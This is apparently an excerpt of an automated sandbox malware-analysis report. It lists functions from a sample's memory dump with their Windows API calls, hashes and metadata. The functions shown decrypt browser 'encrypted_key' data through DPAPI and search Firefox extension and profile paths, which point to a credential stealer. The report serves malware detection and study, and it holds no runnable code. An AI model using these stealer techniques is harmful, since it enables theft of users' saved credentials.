                                    • API ID: lstrcpy$FileLocal$Alloclstrcatlstrlen$CloseCreateFreeHandleReadSize
                                    • String ID: ^userContextId=4294967295$moz-extension+++
                                    • API String ID: 998311485-3310892237
                                    • Opcode ID: ef5df7e7c3545d5577e3a33fb479c8c47a4ea68830f2703930e98706493138a5
                                    • Instruction ID: c602c06afe9d84a5030ac66430ada31bd7bef6dcdf73177765a77c051158524f
                                    • Opcode Fuzzy Hash: ef5df7e7c3545d5577e3a33fb479c8c47a4ea68830f2703930e98706493138a5
                                    • Instruction Fuzzy Hash: 17511175D10108BADB14FBA1DC96DED7378AF54300F508528F81667191EF38AA19EFA2
                                    Function 00FB3560 Relevance: 6.1, APIs: 4, Instructions: 124COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1746921338.0000000000FA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                    • Associated: 00000000.00000002.1746901409.0000000000FA0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1746921338.0000000001051000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1746921338.000000000105D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1746921338.0000000001082000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1746921338.00000000011EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747120792.00000000011FE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747120792.0000000001390000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747120792.0000000001470000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747120792.0000000001493000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747120792.000000000149C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747120792.00000000014AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747457383.00000000014AB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747581886.0000000001650000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747599841.0000000001651000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_fa0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcpy$lstrlen
                                    • String ID:
                                    • API String ID: 367037083-0
                                    • Opcode ID: c301c68da10f74e16703cf7bf77b3111b14731782d2629b8af38273f5b91450b
                                    • Instruction ID: 03dd16a2e02a049871077aaed1c43119da02f2cbf38ced554c740e2b8a2f9c8b
                                    • Opcode Fuzzy Hash: c301c68da10f74e16703cf7bf77b3111b14731782d2629b8af38273f5b91450b
                                    • Instruction Fuzzy Hash: B8413F75D10109EBCB08EFE6DD55EEEB779AF44304F108018E41677280EB79AA45EFA2
                                    Function 00FA9CE0 Relevance: 6.1, APIs: 1, Strings: 3, Instructions: 98COMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 00FBA740: lstrcpy.KERNEL32(00FC0E17,00000000), ref: 00FBA788
                                      • Part of subcall function 00FA99C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00FA99EC
                                      • Part of subcall function 00FA99C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00FA9A11
                                      • Part of subcall function 00FA99C0: LocalAlloc.KERNEL32(00000040,?), ref: 00FA9A31
                                      • Part of subcall function 00FA99C0: ReadFile.KERNEL32(000000FF,?,00000000,00FA148F,00000000), ref: 00FA9A5A
                                      • Part of subcall function 00FA99C0: LocalFree.KERNEL32(00FA148F), ref: 00FA9A90
                                      • Part of subcall function 00FA99C0: CloseHandle.KERNEL32(000000FF), ref: 00FA9A9A
                                      • Part of subcall function 00FB8E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00FB8E52
                                    • StrStrA.SHLWAPI(00000000,"encrypted_key":"), ref: 00FA9D39
                                      • Part of subcall function 00FA9AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00FA4EEE,00000000,00000000), ref: 00FA9AEF
                                      • Part of subcall function 00FA9AC0: LocalAlloc.KERNEL32(00000040,?,?,?,00FA4EEE,00000000,?), ref: 00FA9B01
                                      • Part of subcall function 00FA9AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00FA4EEE,00000000,00000000), ref: 00FA9B2A
                                      • Part of subcall function 00FA9AC0: LocalFree.KERNEL32(?,?,?,?,00FA4EEE,00000000,?), ref: 00FA9B3F
                                      • Part of subcall function 00FA9B60: CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 00FA9B84
                                      • Part of subcall function 00FA9B60: LocalAlloc.KERNEL32(00000040,00000000), ref: 00FA9BA3
                                      • Part of subcall function 00FA9B60: LocalFree.KERNEL32(?), ref: 00FA9BD3
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1746921338.0000000000FA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                    • Associated: 00000000.00000002.1746901409.0000000000FA0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1746921338.0000000001051000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1746921338.000000000105D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1746921338.0000000001082000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1746921338.00000000011EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747120792.00000000011FE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747120792.0000000001390000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747120792.0000000001470000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747120792.0000000001493000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747120792.000000000149C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747120792.00000000014AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747457383.00000000014AB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747581886.0000000001650000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747599841.0000000001651000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_fa0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Local$Alloc$CryptFileFree$BinaryString$CloseCreateDataHandleReadSizeUnprotectlstrcpy
                                    • String ID: $"encrypted_key":"$DPAPI
                                    • API String ID: 2100535398-738592651
                                    • Opcode ID: 63e8561c3665d70b75704c005eb78914aa1ac8fdcffa490cfb2c50cd49eb79af
                                    • Instruction ID: 2059c88e9b25262a0c2185c2b04fd65f8355bcfc1b6273bee6d0558919e11377
                                    • Opcode Fuzzy Hash: 63e8561c3665d70b75704c005eb78914aa1ac8fdcffa490cfb2c50cd49eb79af
                                    • Instruction Fuzzy Hash: EF316DB6D10209ABCF04DFE4DC86EEFB7B8BF49304F144529E901A7241EB749A54DBA1
                                    Function 00FB92E0 Relevance: 6.0, APIs: 4, Instructions: 39fileCOMMON
                                    Download Yara Rule
                                    APIs
                                    • CreateFileA.KERNEL32(00FB3AEE,80000000,00000003,00000000,00000003,00000080,00000000,?,00FB3AEE,?), ref: 00FB92FC
                                    • GetFileSizeEx.KERNEL32(000000FF,00FB3AEE), ref: 00FB9319
                                    • CloseHandle.KERNEL32(000000FF), ref: 00FB9327
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1746921338.0000000000FA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                    • Associated: 00000000.00000002.1746901409.0000000000FA0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1746921338.0000000001051000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1746921338.000000000105D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1746921338.0000000001082000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1746921338.00000000011EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747120792.00000000011FE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747120792.0000000001390000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747120792.0000000001470000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747120792.0000000001493000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747120792.000000000149C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747120792.00000000014AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747457383.00000000014AB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747581886.0000000001650000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747599841.0000000001651000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_fa0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: File$CloseCreateHandleSize
                                    • String ID:
                                    • API String ID: 1378416451-0
                                    • Opcode ID: c3721234a614ab186a601f15613f2d2b1a5d9c4a02c909a7724b1c717667b397
                                    • Instruction ID: d536d7a4c212c8cb3927b2635e94bfc5e0cdf5f380e5aaaa87c0ecbf3d337368
                                    • Opcode Fuzzy Hash: c3721234a614ab186a601f15613f2d2b1a5d9c4a02c909a7724b1c717667b397
                                    • Instruction Fuzzy Hash: 0EF0AF75E44208BBDB24DFF1EC08F9E77F9AB48720F10C264B621AB2C4D6B196409F50
                                    Function 00FBC742 Relevance: 6.0, APIs: 4, Instructions: 34COMMONLIBRARYCODE
                                    Download Yara Rule
                                    APIs
                                    • __getptd.LIBCMT ref: 00FBC74E
                                      • Part of subcall function 00FBBF9F: __amsg_exit.LIBCMT ref: 00FBBFAF
                                    • __getptd.LIBCMT ref: 00FBC765
                                    • __amsg_exit.LIBCMT ref: 00FBC773
                                    • __updatetlocinfoEx_nolock.LIBCMT ref: 00FBC797
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1746921338.0000000000FA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                    • Associated: 00000000.00000002.1746901409.0000000000FA0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1746921338.0000000001051000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1746921338.000000000105D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1746921338.0000000001082000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1746921338.00000000011EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747120792.00000000011FE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747120792.0000000001390000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747120792.0000000001470000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747120792.0000000001493000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747120792.000000000149C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747120792.00000000014AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747457383.00000000014AB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747581886.0000000001650000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747599841.0000000001651000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_fa0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: __amsg_exit__getptd$Ex_nolock__updatetlocinfo
                                    • String ID:
                                    • API String ID: 300741435-0
                                    • Opcode ID: 56503a2a38b82b7401675de88fc211025f9c125d074bda83bd651ea926c29dc1
                                    • Instruction ID: 486c0d0e046fcf33e8974c39e2e6e7b9c795e56b1e1f87a3169af3331796e446
                                    • Opcode Fuzzy Hash: 56503a2a38b82b7401675de88fc211025f9c125d074bda83bd651ea926c29dc1
                                    • Instruction Fuzzy Hash: 7CF09A32D046059BD725BBBB9C07BEA37A0AF00721F244149F454A71D2DFAC9940BE96
                                    Function 00FB4F40 Relevance: 5.1, APIs: 4, Instructions: 70stringCOMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 00FB8DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00FB8E0B
                                    • lstrcat.KERNEL32(?,00000000), ref: 00FB4F7A
                                    • lstrcat.KERNEL32(?,00FC1070), ref: 00FB4F97
                                    • lstrcat.KERNEL32(?,008C8E60), ref: 00FB4FAB
                                    • lstrcat.KERNEL32(?,00FC1074), ref: 00FB4FBD
                                      • Part of subcall function 00FB4910: wsprintfA.USER32 ref: 00FB492C
                                      • Part of subcall function 00FB4910: FindFirstFileA.KERNEL32(?,?), ref: 00FB4943
                                      • Part of subcall function 00FB4910: StrCmpCA.SHLWAPI(?,00FC0FDC), ref: 00FB4971
                                      • Part of subcall function 00FB4910: StrCmpCA.SHLWAPI(?,00FC0FE0), ref: 00FB4987
                                      • Part of subcall function 00FB4910: FindNextFileA.KERNEL32(000000FF,?), ref: 00FB4B7D
                                      • Part of subcall function 00FB4910: FindClose.KERNEL32(000000FF), ref: 00FB4B92
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1746921338.0000000000FA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                    • Associated: 00000000.00000002.1746901409.0000000000FA0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1746921338.0000000001051000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1746921338.000000000105D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1746921338.0000000001082000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1746921338.00000000011EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747120792.00000000011FE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747120792.0000000001390000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747120792.0000000001470000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747120792.0000000001493000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747120792.000000000149C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747120792.00000000014AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747457383.00000000014AB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747581886.0000000001650000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747599841.0000000001651000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_fa0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcat$Find$File$CloseFirstFolderNextPathwsprintf
                                    • String ID:
                                    • API String ID: 2667927680-0
                                    • Opcode ID: 331960265713821592a71db78d2d1442dd483ba44454afab2185220d1025a306
                                    • Instruction ID: 2f689bfd17f519a929779ae6f1b5d99b18a4399dfd4f3e43260afc2a64691be4
                                    • Opcode Fuzzy Hash: 331960265713821592a71db78d2d1442dd483ba44454afab2185220d1025a306
                                    • Instruction Fuzzy Hash: 5A21887A900208ABC768F7E0EC46EE937BCAF54700F004558B65997185EF789AC9DF92